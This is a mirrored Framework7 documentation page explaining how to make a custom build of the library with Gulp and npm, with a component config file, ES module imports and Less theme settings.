<!DOCTYPE html>
<html>

<!-- Mirrored from framework7.io/docs/custom-build.html by HTTrack Website Copier/3.x [XR&CO'2017], Tue, 16 Oct 2018 03:57:43 GMT -->
<head>
<meta charset="utf-8">
<title>Framework7 Custom Build | Framework7 Documentation</title>
<meta property="og:image" content="../i/f7-banner.jpg">
<meta name="viewport" content="width=device-width, viewport-fit=cover">
<meta name="twitter:card" content="summary">
<meta name="twitter:site" content="@framework7io">
<meta name="twitter:creator" content="@framework7io">
<meta name="twitter:title" content="Framework7 Custom Build | Framework7 Documentation">
<meta name="twitter:image" content="../../external.html?link=https://avatars0.githubusercontent.com/u/31954178?s=200&amp;v=4">
<link rel="stylesheet" href="../../cdn.framework7.io/css/normalize.html">
<link rel="stylesheet" href="../../cdn.framework7.io/css/main.html">
<link rel="shortcut icon" href="../i/favicon.png">
<script src="../../cdn.framework7.io/js/modernizr-2.7.1.min.html"></script>
</head>
<body class="body-docs">
<header class="internal-header">
<div class="center">
<div class="logo-holder"><a class="logo" href="../../external.html?link=http://framework7.io/"></a></div>
<div class="header-content">
<div class="title">Framework7
<div class="version">v3.4.2</div>
</div>
<ul class="nav">
<li><a href="index.html">Docs</a>
<ul>
<li><a href="introduction.html">Getting Started</a></li>
<li><a href="index.html">Framework7 Core / API</a></li>
<li><a href="../../external.html?link=http://framework7.io/vue/">Framework7 Vue</a></li>
<li><a href="../../external.html?link=http://framework7.io/react/">Framework7 React</a></li>
<li><a href="dom7.html">Dom7</a></li>
<li><a href="../../external.html?link=http://idangero.us/template7/" target="_blank">Template7</a></li>
<li><a href="../../external.html?link=http://v1.framework7.io/" target="_blank">Framework7 v1</a></li>
<li><a href="../../external.html?link=http://v2.framework7.io/" target="_blank">Framework7 v2</a></li>
</ul>
</li>
<li><a href="#">Resources</a>
<ul>
<li><a href="../../external.html?link=http://forum.framework7.io/" target="_blank">Community Forum</a></li>
<li><a href="../../external.html?link=http://framework7.io/tutorials/">Tutorials</a></li>
<li><a href="../../external.html?link=http://framework7.io/templates/">Templates</a></li>
<li><a href="../../external.html?link=http://framework7.io/plugins/">Plugins</a></li>
<li><a href="../../external.html?link=http://framework7.io/showcase/">Apps Showcase</a></li>
<li><a href="../../external.html?link=http://framework7.io/icons/">Framework7 Icons</a></li>
</ul>
</li>
<li><a href="../../external.html?link=http://blog.framework7.io/" target="_blank">Blog</a></li>
<li><a href="../../external.html?link=http://framework7.io/contribute/">Contribute</a></li>
</ul>
<div class="patreon-github"><a class="patreon-button" href="../../external.html?link=https://www.patreon.com/vladimirkharlampidi" target="_blank"><span class="patreon-logo"></span><span class="patreon-text">Support Framework7</span></a>
<div class="github-buttons"><a href="../../external.html?link=https://github.com/nolimits4web/framework7/" target="_blank"><img src="../../cdn.framework7.io/i/gh-logo.html"></a><a class="gh-stars" href="../../external.html?link=https://github.com/nolimits4web/framework7/" target="_blank"><span></span> stars</a><a class="gh-forks" href="../../external.html?link=https://github.com/nolimits4web/framework7/" target="_blank"><span></span> forks</a></div>
</div>
</div>
<div class="carbon"><script async type="text/javascript" src="../../cdn.carbonads.com/carbona3d4.js" id="_carbonads_js"></script></div>
</div>
</header>
<div class="bsa-cpc"></div>
<main>
<div class="center">
<div class="docs-nav">
<div class="docs-nav-toggle"><span></span><span></span><span></span></div>
<div class="docs-nav-searchbar">
<input type="search" placeholder="Search"><span class="disable-search"></span>
</div>
<ul>
<li>
<div class="title">Get Started</div>
<ul>
<li><a href="introduction.html">Introduction</a></li>
<li><a href="kitchen-sink.html">Kitchen Sink</a></li>
<li><a href="installation.html">Installation</a></li>
<li><a href="app-layout.html">App HTML Layout</a></li>
<li><a href="rtl-layout.html">RTL Layout</a></li>
<li><a href="init-app.html">Initialize App</a></li>
</ul>
</li>
<li>
<div class="title">Events</div>
<ul>
<li><a href="events.html">Events</a></li>
</ul>
</li>
<li>
<div class="title">Router / Navigation</div>
<ul>
<li><a href="routes.html">Routes</a></li>
<li><a href="router-component.html">Router Component</a></li>
<li><a href="view.html#router-api-methods-properties">Router API</a></li>
</ul>
</li>
<li>
<div class="title">Components</div>
<ul>
<li><a href="app.html">App / Core</a></li>
<li><a href="accordion.html">Accordion / Collapsible</a></li>
<li><a href="action-sheet.html">Action Sheet / Actions</a></li>
<li><a href="autocomplete.html">Autocomplete</a></li>
<li><a href="badge.html">Badge</a></li>
<li><a href="block.html">Block / Content Block</a></li>
<li><a href="button.html">Button</a></li>
<li><a href="calendar.html">Calendar / Datepicker</a></li>
<li><a href="cards.html">Cards</a></li>
<li><a href="checkbox.html">Checkbox</a></li>
<li><a href="chips.html">Chips / Tags</a></li>
<li><a href="contacts-list.html">Contacts List</a></li>
<li><a href="data-table.html">Data Table</a></li>
<li><a href="dialog.html">Dialog</a></li>
<li><a href="elevation.html">Elevation</a></li>
<li><a href="floating-action-button.html">Floating Action Button / FAB</a></li>
<li><a href="form.html">Form Data / Storage</a></li>
<li><a href="gauge.html">Gauge</a></li>
<li><a href="grid.html">Grid / Layout Grid</a></li>
<li><a href="icons.html">Icons</a></li>
<li><a href="infinite-scroll.html">Infinite Scroll</a></li>
<li><a href="inputs.html">Inputs / Form Inputs</a></li>
<li><a href="lazy-load.html">Lazy Load</a></li>
<li><a href="link.html">Link</a></li>
<li><a href="list-view.html">List View</a></li>
<li><a href="list-index.html">List Index</a></li>
<li><a href="login-screen.html">Login Screen</a></li>
<li><a href="messagebar.html">Messagebar</a></li>
<li><a href="messages.html">Messages</a></li>
<li><a href="navbar.html">Navbar</a></li>
<li><a href="notification.html">Notification</a></li>
<li><a href="page.html">Page</a></li>
<li><a href="panel.html">Panel / Side Panels</a></li>
<li><a href="photo-browser.html">Photo Browser</a></li>
<li><a href="picker.html">Picker</a></li>
<li><a href="popover.html">Popover</a></li>
<li><a href="popup.html">Popup</a></li>
<li><a href="preloader.html">Preloader</a></li>
<li><a href="progressbar.html">Progressbar</a></li>
<li><a href="pull-to-refresh.html">Pull to Refresh</a></li>
<li><a href="radio.html">Radio</a></li>
<li><a href="range-slider.html">Range Slider</a></li>
<li><a href="searchbar.html">Searchbar</a></li>
<li><a href="sheet-modal.html">Sheet Modal</a></li>
<li><a href="smart-select.html">Smart Select</a></li>
<li><a href="sortable-list.html">Sortable List</a></li>
<li><a href="statusbar.html">Statusbar</a></li>
<li><a href="stepper.html">Stepper</a></li>
<li><a href="subnavbar.html">Subnavbar</a></li>
<li><a href="swiper.html">Swiper</a></li>
<li><a href="swipeout.html">Swipeout</a></li>
<li><a href="tabs.html">Tabs</a></li>
<li><a href="timeline.html">Timeline</a></li>
<li><a href="toast.html">Toast</a></li>
<li><a href="toggle.html">Toggle</a></li>
<li><a href="toolbar-tabbar.html">Toolbar / Tabbar</a></li>
<li><a href="tooltip.html">Tooltip</a></li>
<li><a href="vi.html">Video Intelligence (vi)</a></li>
<li><a href="view.html">View / Router</a></li>
<li><a href="virtual-list.html">Virtual List</a></li>
</ul>
</li>
<li>
<div class="title">Framework7 Icons</div>
<ul>
<li><a href="../../external.html?link=http://framework7.io/icons/">Framework7 Icons Cheatsheet</a></li>
</ul>
</li>
<li>
<div class="title">Styling</div>
<ul>
<li><a href="iphone-x.html">iPhone X</a></li>
<li><a href="color-themes.html">Color Themes</a></li>
<li><a href="typography.html">Typography</a></li>
<li><a href="hairlines.html">Hairlines</a></li>
</ul>
</li>
<li>
<div class="title">Dom7</div>
<ul>
<li><a href="dom7.html">Dom7</a></li>
</ul>
</li>
<li>
<div class="title">Template7</div>
<ul>
<li><a href="template7.html">Template7</a></li>
</ul>
</li>
<li>
<div class="title">Fast Clicks</div>
<ul>
<li><a href="fast-clicks.html">Fast Clicks</a></li>
<li><a href="active-state.html">Active State</a></li>
<li><a href="tap-hold.html">Tap Hold Event (Long Tap)</a></li>
<li><a href="touch-ripple.html">Touch Ripple (MD Theme)</a></li>
</ul>
</li>
<li>
<div class="title">Utilities</div>
<ul>
<li><a href="request.html">Request / Ajax</a></li>
<li><a href="utils.html">Utils</a></li>
<li><a href="device.html">Device</a></li>
<li><a href="support.html">Support</a></li>
</ul>
</li>
<li>
<div class="title">Plugins API</div>
<ul>
<li><a href="plugins-api.html">Plugins API</a></li>
</ul>
</li>
<li>
<div class="title">Lazy Modules</div>
<ul>
<li><a href="lazy-modules.html">Lazy Modules</a></li>
</ul>
</li>
<li>
<div class="title">Custom Build</div>
<ul>
<li><a href="custom-build.html">Custom Build</a></li>
</ul>
</li>
</ul>
</div>
<div class="docs-content">
<div class="improve-docs-link"><a href="../../external.html?link=https://github.com/framework7io/framework7-website/edit/master/src/pug/docs/custom-build.pug" target="_blank">Improve this Doc</a></div>
<h1>Framework7 Custom Build</h1>
<ul class="docs-index"></ul>
<h2>Custom Build</h2>
<p>Framework7 comes with Gulp builder that allows to build custom library version where you may include only required components/modules. We need the following:</p>
<ol>
<li>
<p>Download and unzip <a href="../../external.html?link=https://github.com/framework7io/framework7" target="_blank">Framework7 GitHub repository</a> to local folder</p>
</li>
<li>
<p>Install <a href="../../external.html?link=http://nodejs.org/" target="_blank">Node.js</a> (if not installed)</p>
</li>
<li>
<p>Install Gulp (if not installed) by executing the following command in terminal:</p><pre><code class="">$ npm install --global gulp</pre></code>
</li>
<li>
<p>Now, we need to install required dependencies. Go to the folder with downloaded and unzipped Framework7 repository and execute in terminal:</p><pre><code class="">$ npm install</pre></code>
</li>
<li>Copy <code>scripts/build-config.js</code> file to some place in the downloaded folder and rename it let's say to <code>scripts/my-config.js</code></li>
<li>
Open this file and remove components that you don't need or modify color theme and included colors:<pre><code class="js"><span class="token comment">/* my-config.js */</span>
<span class="token keyword">const</span> config <span class="token operator">=</span> <span class="token punctuation">{</span>
  target<span class="token punctuation">:</span> <span class="token string">'universal'</span><span class="token punctuation">,</span>
  rtl<span class="token punctuation">:</span> <span class="token boolean">false</span><span class="token punctuation">,</span> <span class="token comment">// change to true to generate RTL styles</span>

  <span class="token comment">// remove any components you don't need</span>
  components<span class="token punctuation">:</span> <span class="token punctuation">[</span>
    <span class="token string">'dialog'</span><span class="token punctuation">,</span>
    <span class="token string">'popup'</span><span class="token punctuation">,</span>
    <span class="token string">'login-screen'</span><span class="token punctuation">,</span>
    <span class="token string">'popover'</span><span class="token punctuation">,</span>
    <span class="token string">'actions'</span><span class="token punctuation">,</span>
    <span class="token string">'sheet'</span><span class="token punctuation">,</span>
    <span class="token string">'toast'</span><span class="token punctuation">,</span>
    <span class="token string">'preloader'</span><span class="token punctuation">,</span>
    <span class="token string">'progressbar'</span><span class="token punctuation">,</span>
    <span class="token string">'sortable'</span><span class="token punctuation">,</span>
    <span class="token string">'swipeout'</span><span class="token punctuation">,</span>
    <span class="token string">'accordion'</span><span class="token punctuation">,</span>
    <span class="token string">'contacts-list'</span><span class="token punctuation">,</span>
    <span class="token string">'virtual-list'</span><span class="token punctuation">,</span>
    <span class="token string">'timeline'</span><span class="token punctuation">,</span>
    <span class="token string">'tabs'</span><span class="token punctuation">,</span>
    <span class="token string">'panel'</span><span class="token punctuation">,</span>
    <span class="token string">'card'</span><span class="token punctuation">,</span>
    <span class="token string">'chip'</span><span class="token punctuation">,</span>
    <span class="token string">'form'</span><span class="token punctuation">,</span>
    <span class="token string">'input'</span><span class="token punctuation">,</span>
    <span class="token string">'checkbox'</span><span class="token punctuation">,</span>
    <span class="token string">'radio'</span><span class="token punctuation">,</span>
    <span class="token string">'toggle'</span><span class="token punctuation">,</span>
    <span class="token string">'range'</span><span class="token punctuation">,</span>
    <span class="token string">'stepper'</span><span class="token punctuation">,</span>
    <span class="token string">'smart-select'</span><span class="token punctuation">,</span>
    <span class="token string">'grid'</span><span class="token punctuation">,</span>
    <span class="token string">'calendar'</span><span class="token punctuation">,</span>
    <span class="token string">'picker'</span><span class="token punctuation">,</span>
    <span class="token string">'infinite-scroll'</span><span class="token punctuation">,</span>
    <span class="token string">'pull-to-refresh'</span><span class="token punctuation">,</span>
    <span class="token string">'lazy'</span><span class="token punctuation">,</span>
    <span class="token string">'data-table'</span><span class="token punctuation">,</span>
    <span class="token string">'fab'</span><span class="token punctuation">,</span>
    <span class="token string">'searchbar'</span><span class="token punctuation">,</span>
    <span class="token string">'messages'</span><span class="token punctuation">,</span>
    <span class="token string">'messagebar'</span><span class="token punctuation">,</span>
    <span class="token string">'swiper'</span><span class="token punctuation">,</span>
    <span class="token string">'photo-browser'</span><span class="token punctuation">,</span>
    <span class="token string">'notification'</span><span class="token punctuation">,</span>
    <span class="token string">'autocomplete'</span><span class="token punctuation">,</span>
    <span class="token string">'tooltip'</span><span class="token punctuation">,</span>
    <span class="token string">'gauge'</span><span class="token punctuation">,</span>
    <span class="token string">'vi'</span><span class="token punctuation">,</span>
    <span class="token string">'typography'</span><span class="token punctuation">,</span>
  <span class="token punctuation">]</span><span class="token punctuation">,</span>
  <span class="token comment">// include/exclude dark theme styles</span>
  darkTheme<span class="token punctuation">:</span> <span class="token boolean">true</span><span class="token punctuation">,</span>
  <span class="token comment">// include/exclude themes</span>
  themes<span class="token punctuation">:</span> <span class="token punctuation">[</span>
    <span class="token string">'ios'</span><span class="token punctuation">,</span>
    <span class="token string">'md'</span><span class="token punctuation">,</span>
  <span class="token punctuation">]</span><span class="token punctuation">,</span>
  <span class="token comment">// modify colors</span>
  ios<span class="token punctuation">:</span> <span class="token punctuation">{</span>
    themeColor<span class="token punctuation">:</span> <span class="token string">'#007aff'</span><span class="token punctuation">,</span>
    colors<span class="token punctuation">:</span> <span class="token punctuation">{</span>
      red<span class="token punctuation">:</span> <span class="token string">'#ff3b30'</span><span class="token punctuation">,</span>
      green<span class="token punctuation">:</span> <span class="token string">'#4cd964'</span><span class="token punctuation">,</span>
      blue<span class="token punctuation">:</span> <span class="token string">'#007aff'</span><span class="token punctuation">,</span>
      pink<span class="token punctuation">:</span> <span class="token string">'#ff2d55'</span><span class="token punctuation">,</span>
      yellow<span class="token punctuation">:</span> <span class="token string">'#ffcc00'</span><span class="token punctuation">,</span>
      orange<span class="token punctuation">:</span> <span class="token string">'#ff9500'</span><span class="token punctuation">,</span>
      gray<span class="token punctuation">:</span> <span class="token string">'#8e8e93'</span><span class="token punctuation">,</span>
      white<span class="token punctuation">:</span> <span class="token string">'#ffffff'</span><span class="token punctuation">,</span>
      black<span class="token punctuation">:</span> <span class="token string">'#000000'</span><span class="token punctuation">,</span>
    <span class="token punctuation">}</span><span class="token punctuation">,</span>
  <span class="token punctuation">}</span><span class="token punctuation">,</span>
  md<span class="token punctuation">:</span> <span class="token punctuation">{</span>
    themeColor<span class="token punctuation">:</span> <span class="token string">'#2196f3'</span><span class="token punctuation">,</span>
    colors<span class="token punctuation">:</span> <span class="token punctuation">{</span>
      red<span class="token punctuation">:</span> <span class="token string">'#f44336'</span><span class="token punctuation">,</span>
      green<span class="token punctuation">:</span> <span class="token string">'#4caf50'</span><span class="token punctuation">,</span>
      blue<span class="token punctuation">:</span> <span class="token string">'#2196f3'</span><span class="token punctuation">,</span>
      pink<span class="token punctuation">:</span> <span class="token string">'#e91e63'</span><span class="token punctuation">,</span>
      yellow<span class="token punctuation">:</span> <span class="token string">'#ffeb3b'</span><span class="token punctuation">,</span>
      orange<span class="token punctuation">:</span> <span class="token string">'#ff9800'</span><span class="token punctuation">,</span>
      gray<span class="token punctuation">:</span> <span class="token string">'#9e9e9e'</span><span class="token punctuation">,</span>
      white<span class="token punctuation">:</span> <span class="token string">'#ffffff'</span><span class="token punctuation">,</span>
      black<span class="token punctuation">:</span> <span class="token string">'#000000'</span><span class="token punctuation">,</span>
    <span class="token punctuation">}</span><span class="token punctuation">,</span>
  <span class="token punctuation">}</span><span class="token punctuation">,</span>
<span class="token punctuation">}</span><span class="token punctuation">;</span>

module<span class="token punctuation">.</span>exports <span class="token operator">=</span> config<span class="token punctuation">;</span>
</pre></code>
</li>
<li>
<p>Now, we are ready to build custom version of Framework7. We need to execute:</p><pre><code class="">$ npm run build-core:prod -- --config scripts/my-config.js --output path/to/output/folder</pre></code>
</li>
<li>
<p>That is all. Now you should see newly generated js and css files in specified output folder</p>
</li>
<li>
<p>If you are in hurry and want to see how its working then do follow step 1 to 4</p><pre><code class="">$ npm run build-core:dev</pre></code>
<p>The result is available in build/ folder.</p>
</li>
<li>
<p>To build production version of Framework7:</p><pre><code class="">$ npm run build-core:prod</pre></code>
<p>Production version will be available in dist/ folder.</p>
</li>
<li>
Run Kitchen Sink with development environment<pre><code class="">$ npm run core:dev</pre></code></li>
<li>
Run Kitchen Sink with Production environment<pre><code class="">$ npm run core:prod</pre></code></li>
<li>Kitchen Sink is live
<p>Visit http://localhost:3000/kitchen-sink/core/ From Youre Browser</p>
</li>
</ol>
<h2>ES Modules</h2>
<p>If you use bundler like Webpack or Rollup you can use only required Framework7 JS components without that build process and by importing only required components:</p><pre><code class="js"><span class="token comment">// Import core framework</span>
<span class="token keyword-block">import</span> Framework7 <span class="token keyword-block">from</span> <span class="token string">'framework7'</span><span class="token punctuation">;</span>

<span class="token comment">// Import additional components</span>
<span class="token keyword-block">import</span> Searchbar <span class="token keyword-block">from</span> <span class="token string">'framework7/components/searchbar/searchbar.js'</span><span class="token punctuation">;</span>
<span class="token keyword-block">import</span> Calendar <span class="token keyword-block">from</span> <span class="token string">'framework7/components/calendar/calendar.js'</span><span class="token punctuation">;</span>
<span class="token keyword-block">import</span> Popup <span class="token keyword-block">from</span> <span class="token string">'framework7/components/popup/popup.js'</span><span class="token punctuation">;</span>

<span class="token comment">// Install F7 Components using .use() method on Framework7 class:</span>
Framework7<span class="token punctuation">.</span><span class="token function">use</span><span class="token punctuation">(</span><span class="token punctuation">[</span>Searchbar<span class="token punctuation">,</span> Calendar<span class="token punctuation">,</span> Popup<span class="token punctuation">]</span><span class="token punctuation">)</span><span class="token punctuation">;</span>

<span class="token comment">// Init app</span>
<span class="token keyword">var</span> app <span class="token operator">=</span> <span class="token keyword">new</span> <span class="token class-name">Framework</span><span class="token punctuation">(</span><span class="token punctuation">{</span><span class="token comment">/*...*/</span><span class="token punctuation">}</span><span class="token punctuation">)</span><span class="token punctuation">;</span></pre></code>
<p>The following components are available for importing (all other components are part of the core):</p>
<table>
<thead>
<tr>
<th>Component</th>
<th>Path</th>
<th></th>
</tr>
</thead>
<tbody>
<tr>
<td>Dialog</td>
<td><code>framework7/components/dialog/dialog.js</code></td>
</tr>
<tr>
<td>Popup</td>
<td><code>framework7/components/popup/popup.js</code></td>
</tr>
<tr>
<td>LoginScreen</td>
<td><code>framework7/components/login-screen/login-screen.js</code></td>
</tr>
<tr>
<td>Popover</td>
<td><code>framework7/components/popover/popover.js</code></td>
</tr>
<tr>
<td>Actions</td>
<td><code>framework7/components/actions/actions.js</code></td>
</tr>
<tr>
<td>Sheet</td>
<td><code>framework7/components/sheet/sheet.js</code></td>
</tr>
<tr>
<td>Toast</td>
<td><code>framework7/components/toast/toast.js</code></td>
</tr>
<tr>
<td>Preloader</td>
<td><code>framework7/components/preloader/preloader.js</code></td>
</tr>
<tr>
<td>Progressbar</td>
<td><code>framework7/components/progressbar/progressbar.js</code></td>
</tr>
<tr>
<td>Sortable</td>
<td><code>framework7/components/sortable/sortable.js</code></td>
</tr>
<tr>
<td>Swipeout</td>
<td><code>framework7/components/swipeout/swipeout.js</code></td>
</tr>
<tr>
<td>Accordion</td>
<td><code>framework7/components/accordion/accordion.js</code></td>
</tr>
<tr>
<td>ContactsList</td>
<td><code>framework7/components/contacts-list/contacts-list.js</code></td>
</tr>
<tr>
<td>VirtualList</td>
<td><code>framework7/components/virtual-list/virtual-list.js</code></td>
</tr>
<tr>
<td>ListIndex</td>
<td><code>framework7/components/list-index/list-index.js</code></td>
</tr>
<tr>
<td>Timeline</td>
<td><code>framework7/components/timeline/timeline.js</code></td>
</tr>
<tr>
<td>Tabs</td>
<td><code>framework7/components/tabs/tabs.js</code></td>
</tr>
<tr>
<td>Panel</td>
<td><code>framework7/components/panel/panel.js</code></td>
</tr>
<tr>
<td>Card</td>
<td><code>framework7/components/card/card.js</code></td>
</tr>
<tr>
<td>Chip</td>
<td><code>framework7/components/chip/chip.js</code></td>
</tr>
<tr>
<td>Form</td>
<td><code>framework7/components/form/form.js</code></td>
</tr>
<tr>
<td>Input</td>
<td><code>framework7/components/input/input.js</code></td>
</tr>
<tr>
<td>Checkbox</td>
<td><code>framework7/components/checkbox/checkbox.js</code></td>
</tr>
<tr>
<td>Radio</td>
<td><code>framework7/components/radio/radio.js</code></td>
</tr>
<tr>
<td>Toggle</td>
<td><code>framework7/components/toggle/toggle.js</code></td>
</tr>
<tr>
<td>Range</td>
<td><code>framework7/components/range/range.js</code></td>
</tr>
<tr>
<td>Stepper</td>
<td><code>framework7/components/stepper/stepper.js</code></td>
</tr>
<tr>
<td>SmartSelect</td>
<td><code>framework7/components/smart-select/smart-select.js</code></td>
</tr>
<tr>
<td>Grid</td>
<td><code>framework7/components/grid/grid.js</code></td>
</tr>
<tr>
<td>Calendar</td>
<td><code>framework7/components/calendar/calendar.js</code></td>
</tr>
<tr>
<td>Picker</td>
<td><code>framework7/components/picker/picker.js</code></td>
</tr>
<tr>
<td>InfiniteScroll</td>
<td><code>framework7/components/infinite-scroll/infinite-scroll.js</code></td>
</tr>
<tr>
<td>PullToRefresh</td>
<td><code>framework7/components/pull-to-refresh/pull-to-refresh.js</code></td>
</tr>
<tr>
<td>Lazy</td>
<td><code>framework7/components/lazy/lazy.js</code></td>
</tr>
<tr>
<td>DataTable</td>
<td><code>framework7/components/data-table/data-table.js</code></td>
</tr>
<tr>
<td>Fab</td>
<td><code>framework7/components/fab/fab.js</code></td>
</tr>
<tr>
<td>Searchbar</td>
<td><code>framework7/components/searchbar/searchbar.js</code></td>
</tr>
<tr>
<td>Messages</td>
<td><code>framework7/components/messages/messages.js</code></td>
</tr>
<tr>
<td>Messagebar</td>
<td><code>framework7/components/messagebar/messagebar.js</code></td>
</tr>
<tr>
<td>Swiper</td>
<td><code>framework7/components/swiper/swiper.js</code></td>
</tr>
<tr>
<td>PhotoBrowser</td>
<td><code>framework7/components/photo-browser/photo-browser.js</code></td>
</tr>
<tr>
<td>Notification</td>
<td><code>framework7/components/notification/notification.js</code></td>
</tr>
<tr>
<td>Autocomplete</td>
<td><code>framework7/components/autocomplete/autocomplete.js</code></td>
</tr>
<tr>
<td>Tooltip</td>
<td><code>framework7/components/tooltip/tooltip.js</code></td>
</tr>
<tr>
<td>Gauge</td>
 <td><code>framework7/components/gauge/gauge.js</code></td>
</tr>
<tr>
<td>Vi</td>
<td><code>framework7/components/vi/vi.js</code></td>
</tr>
<tr>
<td>Typography</td>
<td><code>framework7/components/typography/typography.js</code></td>
</tr>
</tbody>
</table>
<h2>Less.js</h2>
<p>Framework7 styles are build with <a href="../../external.html?link=http://lesscss.org/" target="_blank">Less.js</a>. If you use Less and NPM in your app/project then you can easily create custom framework7 stylesheet with only components you need.</p>
<p>Create your own <code>framework7.less</code> file:</p><pre><code class="less"><span class="token comment">// core</span>
<span class="token variable">@import</span> <span class="token url">url('path/to/node_modules/framework7/framework7.less')</span><span class="token punctuation">;</span>

<span class="token comment">// import only components you need</span>
<span class="token variable">@import</span> <span class="token url">url('path/to/node_modules/framework7/components/searchbar/searchbar.less')</span><span class="token punctuation">;</span>
<span class="token variable">@import</span> <span class="token url">url('path/to/node_modules/framework7/components/calendar/calendar.less')</span><span class="token punctuation">;</span>
<span class="token variable">@import</span> <span class="token url">url('path/to/node_modules/framework7/components/popup/popup.less')</span><span class="token punctuation">;</span></pre></code>
<p>We can go even further and specify Framework7's main color theme and required colors in custom <code>framework7.less</code> file:</p><pre><code class="less"><span class="token comment">// core</span>
<span class="token variable">@import</span> <span class="token url">url('path/to/node_modules/framework7/framework7.less')</span><span class="token punctuation">;</span>

<span class="token comment">// import only components you need</span>
<span class="token variable">@import</span> <span class="token url">url('path/to/node_modules/framework7/components/searchbar/searchbar.less')</span><span class="token punctuation">;</span>
<span class="token variable">@import</span> <span class="token url">url('path/to/node_modules/framework7/components/calendar/calendar.less')</span><span class="token punctuation">;</span>
<span class="token variable">@import</span> <span class="token url">url('path/to/node_modules/framework7/components/popup/popup.less')</span><span class="token punctuation">;</span>

<span class="token comment">// include/exclude themes</span>
<span class="token variable">@includeIosTheme<span class="token punctuation">:</span></span> true<span class="token punctuation">;</span>
<span class="token variable">@includeMdTheme<span class="token punctuation">:</span></span> true<span class="token punctuation">;</span>

<span class="token comment">// include/exclude dark theme</span>
<span class="token variable">@includeDarkTheme<span class="token punctuation">:</span></span> true<span class="token punctuation">;</span>

<span class="token comment">// iOS theme color</span>
<span class="token variable">@themeColorIos<span class="token punctuation">:</span></span> #007aff<span class="token punctuation">;</span>
<span class="token comment">// MD theme color</span>
<span class="token variable">@themeColorMd<span class="token punctuation">:</span></span> #2196f3<span class="token punctuation">;</span>

<span class="token comment">// Extra colors for iOS theme</span>
<span class="token variable">@colorsIos<span class="token punctuation">:</span></span> red #ff3b30<span class="token punctuation">,</span> green #4cd964<span class="token punctuation">,</span> blue #007aff<span class="token punctuation">,</span> pink #ff2d55<span class="token punctuation">,</span> yellow #ffcc00<span class="token punctuation">,</span> orange #ff9500<span class="token punctuation">,</span> gray #8e8e93<span class="token punctuation">,</span> white #ffffff<span class="token punctuation">,</span> black #000000<span class="token punctuation">;</span>

<span class="token comment">// Extra colors for MD theme</span>
<span class="token variable">@colorsMd<span class="token punctuation">:</span></span> red #f44336<span class="token punctuation">,</span> green #4caf50<span class="token punctuation">,</span> blue #2196f3<span class="token punctuation">,</span> pink #e91e63<span class="token punctuation">,</span> yellow #ffeb3b<span class="token punctuation">,</span> orange #ff9800<span class="token punctuation">,</span> gray #9e9e9e<span class="token punctuation">,</span> white #ffffff<span class="token punctuation">,</span> black #000000<span class="token punctuation">;</span>

<span class="token comment">// change to true to generate RTL styles</span>
<span class="token variable">@rtl<span class="token punctuation">:</span></span> false<span class="token punctuation">;</span></pre></code>
</div>
</div>
</main>
<footer>
<div class="center">
<div class="links">
<div class="links-block">
<div class="links-block-title">Project</div>
<ul>
<li><a href="../../external.html?link=https://github.com/framework7io/framework7/releases" target="_blank">Download</a></li>
<li><a href="../../external.html?link=http://framework7.io/contribute/">Contribute</a></li>
<li><a href="../../external.html?link=http://framework7.io/sponsors/">Sponsors</a></li>
<li><a href="../../external.html?link=http://blog.framework7.io/" target="_blank">Blog</a></li>
<li><a href="../../external.html?link=https://github.com/framework7io/framework7/blob/master/CHANGELOG.md" target="_blank">Changelog</a></li>
</ul>
</div>
<div class="links-block">
<div class="links-block-title">Docs</div>
<ul>
<li><a href="index.html">Framework7 Core / API</a></li>
<li><a href="../../external.html?link=http://framework7.io/vue/">Framework7 Vue</a></li>
<li><a href="../../external.html?link=http://framework7.io/react/">Framework7 React</a></li>
<li><a href="dom7.html">Dom7</a></li>
<li><a href="../../external.html?link=http://idangero.us/template7/" target="_blank">Template7</a></li>
<li><a href="../../external.html?link=http://v1.framework7.io/">Framework7 v1</a></li>
<li><a href="../../external.html?link=http://v2.framework7.io/">Framework7 v2</a></li>
</ul>
</div>
<div class="links-block">
<div class="links-block-title">Resources</div>
<ul>
<li><a href="../../external.html?link=http://forum.framework7.io/" target="_blank">Community Forum</a></li>
<li><a href="../../external.html?link=http://framework7.io/tutorials/">Tutorials</a></li>
<li><a href="../../external.html?link=http://framework7.io/templates/">Templates</a></li>
<li><a href="../../external.html?link=http://framework7.io/plugins/">Plugins</a></li>
<li><a href="../../external.html?link=http://framework7.io/showcase/">Apps Showcase</a></li>
<li><a href="../../external.html?link=http://framework7.io/icons/">Framework7 Icons</a></li>
</ul>
</div>
<div class="links-block">
<div class="links-block-title">Connect</div>
<ul>
<li><a href="../../external.html?link=https://twitter.com/framework7io" target="_blank">Twitter</a></li>
<li><a href="../../external.html?link=https://github.com/framework7io" target="_blank">GitHub</a></li>
<li><a href="../../external.html?link=https://facebook.com/framework7io" target="_blank">Facebook</a></li>
</ul>
</div>
<div class="footer-sponsors">
<div class="footer-sponsors-title">Sponsored by</div>
<div class="bsarocks bsap_692e54a1f79f00fb913f5a1c3ec9eaa5" id="bsap_1306028"></div>
</div>
</div>
<div class="copy">
<div class="copy-left">
<p>Code licensed under <a href="../../external.html?link=https://github.com/nolimits4web/Framework7/blob/master/LICENSE" target="_blank">MIT</a></p>
<p>2016 © Framework7 is brought to you by <a href="../../external.html?link=https://twitter.com/nolimits4web" target="_blank">Vladimir Kharlampidi</a> from <a href="../../external.html?link=http://idangero.us/">iDangero.us</a>.</p>
</div>
<div class="copy-right">
<p>Proudly supported by <a href="../../external.html?link=https://www.keycdn.com/" class="keycdn-link" target="_blank"><img src="../../external.html?link=http://cdn.framework7.io/i/keycdn-logo.svg" alt="KeyCDN" title="KeyCDN" class="keycdn-logo"></a></p>
</div>
<div class="clearfix"></div>
</div>
</div>
</footer>
<script src="../../cdn.jsdelivr.net/algoliasearch/3/algoliasearchLite.min.js"></script>
<script src="../../cdn.framework7.io/js/jquery-1.11.0.min.html"></script>
<script src="../../cdn.framework7.io/js/main.html"></script>
<script>
      (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
      (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
      m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
      })(window,document,'script','../../www.google-analytics.com/analytics.js','ga');
      
      ga('create', 'UA-74282934-1', 'auto');
      ga('send', 'pageview');
    </script>
<script>
      (function(){
        var bsa = document.createElement('script');
           bsa.type = 'text/javascript';
           bsa.async = true;
           bsa.src = '../../s3.buysellads.com/ac/bsa.js';
        (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(bsa);
      })();
    </script>
